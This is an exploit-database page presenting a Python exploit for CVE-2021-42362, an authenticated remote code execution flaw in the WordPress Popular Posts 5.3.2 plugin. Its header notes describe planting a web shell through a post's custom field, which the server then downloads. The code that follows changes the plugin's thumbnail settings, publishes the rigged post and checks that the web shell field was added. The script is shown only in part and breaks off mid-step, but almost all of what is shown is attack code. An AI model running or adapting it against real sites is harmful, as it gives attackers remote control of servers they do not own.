Exploits / Vulnerability Discovered : 2021-07-15 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin popular posts 5.3.2 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# CVE: CVE-2021-42362
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
# This script will login with the provided credentials, create a new post and add a custom field with the link to a
# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to
# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is
# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;)
'''
Apply changes to the Popular Posts plugin
'''
body = {
'upload_thumb_src': '',
'thumb_source': 'custom_field',
'thumb_lazy_load': 1,
'thumb_field': 'wpp_thumbnail',
'thumb_field_resize': 1,
'section': 'thumb',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.'):
print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
else:
print('[-] Error while applying settings o the Popular Posts plugin!')
exit()
if post_ID and wp_nonce and ajax_nonce:
print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
else:
if not post_ID: print('[-] Error while gathering post_ID !')
elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')
elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')
exit()
'''
Publish a new post
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"}
header['X-WP-Nonce'] = wp_nonce
header['Content-Type'] = 'application/json'
header['X-HTTP-Method-Override'] = 'PUT'
new_post_page = session.post(new_post_url, headers=header, json=data).text
if new_post_page.find('"status":"publish"'):
print(f'[+] New post named [I\'m the one who knocks] published correctly!')
else:
print('[-] Error while publishing the new post !')
exit()
if new_post_page.find("<tr id='meta-") > 0:
print(f'[+] Added a new Custom Field with the uploaded web shell.')
else:
print('[-] Error while adding the custom field !')
print(new_post_page)
exit()
'''
Give it some views to pop it up in the recent posts
'''
print(f'[+] Giving the new post some views (10) [ ', end="")